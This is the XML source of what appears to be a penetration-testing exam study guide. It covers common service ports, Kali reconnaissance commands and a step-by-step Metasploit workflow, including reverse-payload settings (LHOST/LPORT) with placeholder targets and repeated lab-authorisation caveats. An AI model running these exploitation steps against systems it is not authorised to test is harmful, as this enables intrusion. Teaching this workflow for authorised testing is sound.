      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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21/TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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Service version; anonymous access only if lab permits.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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22/TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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Version and configuration; not automatically vulnerable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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23/TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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Telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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Unencrypted remote terminal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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25/TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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Mail server version and configuration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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53/TCP,UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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DNS service and configuration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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80 / 443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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HTTP / HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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Web technology, headers, paths.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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139 / 445</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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NetBIOS / SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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Shares, SMB version and permissions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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3306/TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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Database service version.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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3389/TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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RDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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Windows remote desktop.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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5432/TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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Database service version.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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8080/TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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Alt. HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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Application/admin panel may use this port.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Useful Kali tools if a service is found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0"/>
        <w:gridCol w:w="4810"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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Tool / command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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48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whatweb http://&lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Fingerprint web framework / server clues.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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curl -I http://&lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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View HTTP response headers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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nikto -h http://&lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Web server misconfiguration / known-issue checks; can be noisy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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dirb http://&lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Discover likely web directories (if DIRB is installed).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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smbclient -L //&lt;TARGET_IP&gt;/ -N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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List SMB shares anonymously if server allows it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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nc -nv &lt;TARGET_IP&gt; &lt;PORT&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Connect to a TCP port and observe a banner, if any.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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searchsploit &lt;SERVICE&gt; &lt;VERSION&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Look for local Exploit-DB references; verify exact applicability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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gvm / OpenVAS / Nessus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Dedicated vulnerability assessment scanners; interfaces/config differ.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EAF2F8"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:start w:w="130" w:type="dxa"/>
              <w:bottom w:w="110" w:type="dxa"/>
              <w:end w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="18659B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CRITICAL DISTINCTION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Port scan: identifies open, closed and filtered ports. Vulnerability scan: checks for potential weaknesses or known issues. Penetration testing: attempts controlled validation/exploitation to show whether weaknesses are exploitable. Findings need confirmation; version alone is not proof.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>From scan output to a defensible candidate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EFF4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MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>PORT     STATE SERVICE VERSION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>21/tcp   open  ftp     ExampleFTP 1.2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>22/tcp   open  ssh     ExampleSSH 8.x</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>80/tcp   open  http    ExampleServer 2.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t>Record: 1) target IP, 2) port/protocol, 3) service and observed version, 4) evidence supporting an issue, 5) matching Metasploit module or reason no exploit is warranted. Sample service names above are illustrative, not identified vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>4  METASPLOIT: MEMORISE THE WORKFLOW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E8F5F4"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:start w:w="130" w:type="dxa"/>
              <w:bottom w:w="110" w:type="dxa"/>
              <w:end w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="18659B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MOST IMPORTANT IDEA</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Metasploit is an exploitation framework. An EXPLOIT module triggers a vulnerability. A PAYLOAD is the action/code to run if exploitation succeeds. AUXILIARY modules typically perform scanning or supporting functions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>The 12-step command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6"/>
        <w:gridCol w:w="3944"/>
        <w:gridCol w:w="4810"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3230"/>
            <w:shd w:fill="183F6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Order</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3230"/>
            <w:shd w:fill="183F6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Inside Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3230"/>
            <w:shd w:fill="183F6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What you are doing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="86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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Launch console from Kali terminal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="86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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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search &lt;KEYWORD_OR_CVE&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Find potential matching modules.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="86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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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info &lt;MODULE_PATH&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Read module description, references and targets.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="86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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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use &lt;MODULE_PATH&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Select the module.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="86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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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show options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Identify required fields; check default values.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="86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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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set RHOSTS &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Choose authorised target IP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="86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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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set RPORT &lt;SERVICE_PORT&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Match the port from your Nmap scan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="86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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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show targets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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See supported target profiles, if applicable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="86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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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show payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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List payloads compatible with chosen exploit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="86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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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set PAYLOAD &lt;PAYLOAD_NAME&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Choose payload if needed; set LHOST/LPORT if reverse.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="86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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Test vulnerability if module supports a check method.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="86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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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run   (or exploit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Run configured module on your lab target.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Other commands often needed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36"/>
        <w:gridCol w:w="5483"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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41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show options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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Display module and payload options again after changing payload.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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set LHOST &lt;KALI_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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Kali/listener IP for a reverse connection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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set LPORT 4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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Listening port; must be reachable and free.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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show advanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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Display extra configuration options.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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back</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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Return from selected module to main msfconsole.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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sessions -l</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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List open sessions, if one was created.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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sessions -i &lt;ID&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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Interact with a session you are authorised to use.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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Leave session/console as appropriate.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FFF6E4"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:start w:w="130" w:type="dxa"/>
              <w:bottom w:w="110" w:type="dxa"/>
              <w:end w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="18659B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>IP ROLES — DO NOT MIX UP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>RHOSTS = Remote HOSTS = vulnerable target. RPORT = target service port. LHOST = Local HOST = Kali interface where a reverse payload connects back. LPORT = port on Kali listener. If Kali has several network interfaces, pick the one reachable from the lab target.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>5  METASPLOIT: EXAM SCENARIOS AND PAYLOADS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Worked workflow: service detected on a lab VM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The following is a generic template. Replace all placeholders using your actual scan evidence; do not assume any service is exploitable just because it is running.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EFF4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MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>search type:exploit &lt;SERVICE_OR_CVE&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>info &lt;EXACT_MODULE_PATH&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>use &lt;EXACT_MODULE_PATH&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>show options</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>set RHOSTS &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>set RPORT &lt;FOUND_PORT&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>show payloads</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>set PAYLOAD &lt;COMPATIBLE_PAYLOAD&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>set LHOST &lt;KALI_LAB_IP&gt;     # if reverse payload</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>set LPORT 4444           # if required</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>show options</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>check                    # only if supported</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>run</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t>If no compatible exploit appears: do not force a random module. Re-check service version, platform/architecture, vulnerability preconditions and whether the module targets the correct product.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Explain payloads in one sentence each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78"/>
        <w:gridCol w:w="6541"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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Remember this</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="307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Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="654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Code/technique that uses a vulnerability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="307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Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="654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Code/action executed on target after a successful exploit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="307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Reverse payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="654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Target initiates connection back to Kali (uses LHOST/LPORT).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="307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Bind payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="654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Target listens; Kali initiates a connection to it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="307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Staged payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="654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Small stager establishes connection, then receives a larger stage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="307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Stageless payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="654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Self-contained payload, delivered in one piece.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="307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Meterpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="654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Feature-rich Metasploit session/payload type; not itself a vulnerability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="307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Auxiliary module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="654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Scanning or other non-exploit functionality.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
